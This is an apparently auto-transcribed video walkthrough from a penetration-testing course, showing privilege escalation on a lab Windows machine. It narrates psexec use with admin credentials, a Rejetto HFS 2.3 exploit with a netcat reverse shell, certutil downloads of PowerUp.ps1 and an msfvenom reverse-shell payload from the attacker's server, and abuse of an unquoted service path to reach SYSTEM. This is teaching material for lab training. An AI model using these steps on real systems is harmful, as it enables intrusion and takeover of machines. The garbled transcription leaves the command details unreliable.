Privilege Escalation Walkthrough: Windows

Video Activity
Join over 3 million cybersecurity professionals advancing their career
Sign up with
or

Already have an account? Sign In »

Time
21 hours 43 minutes
Difficulty
Intermediate
CEU/CPE
22
Video Transcription
00:01
Welcome to the privilege escalation, lab walkthrough,
00:07
buckle your seat belts because we're gonna be here for a while. So the unintended exploitation path that I had hinted at is using PS execs on the Windows box.
00:17
If we are able to figure out the user name and password
00:23
which you've seen before. Right? Administrative password on the Windows box and use I am packet PS exact. You saw this in the slides
00:30
that I showed you about using PS execs. But if I do this, who am I?
00:35
Well, I'm system.
00:37
That's the easy way. Now let's go to the intended exploitation path.
00:42
So if we go and I hinted it was it was a web based exploitation path.
00:48
So if we go 1921681 19,
00:53
you'll notice a file server
00:57
that looks interesting.
00:59
Also, if you look at the link is Readyto, H F s
01:04
And we have a version at 2.3
01:07
so we can use search blight for Readyto.
01:15
And we see we have a python script here.
01:23
So you can do this on medicine ploy it or you can do it not. I'm gonna show you how to not do it on the display because we don't rely on my display for Oh SCP.
01:33
So what I will do is search exploit.
01:37
I am
01:42
and I'm going to take a look at this now. It's pad
01:47
39
01:49
Again, we're looking at code, we're reading the code. We need to understand what we need to change here.
01:59
So I see local I. P. And local port number again. They put comments here, which is very nice.
02:05
So I need to put my box
02:08
and whatever report I want my neck cat listener on it will tell you
02:13
your neck catalyst needs to be on a web server. Well, why don't we just use our web server? We can leave that. Well, let's make this 5555 will make things a little different here,
02:25
but
02:29
I'm going to use locate net cat dot e x C.
02:32
And here's net cat. So, I'm gonna put this or move this.
02:38
Two of our
02:40
dub dub dub
02:43
html.
02:50
Also copy. It might be the better way to go.
02:53
Mhm
02:54
copy.
03:00
You can't die E X C.
03:04
Okay. So now I need to start my server. Right. System.
03:07
CTL Start Apache two.
03:13
All right.
03:16
So now I'm going to need to do
03:21
let's split this.
03:23
Start my neck cat, listener
03:25
Port 5555
03:29
is I'm going to try to run this script
03:32
you specify? Are
03:35
Windows host
03:37
19
03:38
port 80.
03:46
Yeah.
03:52
There we go. Says you may need to run a few times, but now we are on user one's desktop.
03:58
So now we want to do is escalate privileges. Right. Who am I
04:03
Were user net. Users User one. Are we administrator? No, we're not.
04:11
So what we want to do is I talked about the power up script
04:15
So what I can do is locate power up.s one
04:23
and I see it here. So I want to do is
04:27
when a copy it
04:30
right here.
04:32
I'm gonna start
04:33
my server,
04:36
http server
04:44
by then. Three.
04:47
So what I'm gonna do is I need to use cert util download this.
04:51
U R L cash
04:54
F http
04:57
192,168,150
05:01
8000
05:05
Power up PS one
05:10
Power Up.s one.
05:14
All right. We see that. We got that. We can check directory. We see that.
05:17
So, I need to go into power Shell. Now,
05:21
what I'm gonna do is import
05:25
module
05:28
Power up PS one
05:32
and invoke
05:35
all checks.
05:40
So it's checking, we see, checking for unquoted service path and it found it right.
05:46
I found some other things as well.
05:47
But let's take a look at unquoted service path.
05:54
We see we have temp unquoted path. Well, that's a clue. Right.
05:58
So you guys saw this in the in the
06:01
lesson?
06:03
So if we make
06:05
unquoted XC and if we can start or stop this service,
06:11
we can get a shell as system.
06:15
So I'm not gonna use power up. I'm gonna make my own thing here. So I will
06:21
to MSF venom
06:25
payload is windows Shell, reverse TCP
06:31
Hell host is me.
06:36
El port
06:40
1234.
06:43
We're gonna do format is execute herbal and we're gonna do unquoted dot e x c.
06:59
Just waiting for this to
07:01
there we go. Make that
07:03
so I want to use certain until again. But why don't I just change directories to attempt
07:13
so cert
07:14
you till
07:15
you can see that I am in the root directory from my user.
07:23
So root that shell should be in here, cert. Util
07:28
your L. Cash
07:30
F. HDP
07:31
1921-681
07:35
58,000
07:40
unquoted dot T. X. C. Unquoted dot T. X C.
07:48
D I R.
07:53
Now we can try to see if we can start or stop this service.
08:01
So the service names unquoted service.
08:05
So I'm going to get a power shell
08:20
and also start my listener.
08:24
123
08:26
1234
08:31
S. C.
08:33
Start.
08:37
So see access is denied. So what do I do now? I can try to shut down this machine
08:45
and restart it and see what happens.
08:50
So if we restart this unquote E X. C. That should make our shell or activate our shell here.
08:58
But it might take a while
09:01
because when we give the shutdown signal, I think it gives it about a minute
09:05
to shut down. So we have to wait here patiently
09:07
to get our shell
09:18
So we we see the system has restarted here to kick this off.
09:24
So now again, we're waiting patiently to see if we get a shell here
09:35
and there we go.
09:37
Who am I
09:39
now? Our system.
09:41
So we have successfully gotten from user one
09:46
two.
09:48
Well, we don't even need that to system so I can
09:52
Furano SCP land. You're gonna change directory. Users
09:56
change directory administrator,
10:01
change directory desktop.
10:03
And we see that there's a flag there flagged at txT
10:09
Yeah.
10:09
So there you go. There is your proof flag right there.
10:15
All right. So that's the Windows machine.
10:18
Both unintended and intended exploitation path. Now, let's pivot over
10:24
to the Lennox box.
10:28
But what I'm going to do is
10:31
make another video for that. So if you want to go over the Windows machine,
10:35
go ahead. Um, but this is part one for the Windows machine, and I will make a part two for the Lennox machine.
Up Next
Offensive Penetration Testing

The Offensive Penetration Testing course opens the doors to those wanting to begin a penetration testing career. This course will prepare learners to begin their pentesting career journey by understanding what tools, techniques, and resources are available for someone starting out in offensive penetration testing.

Instructed By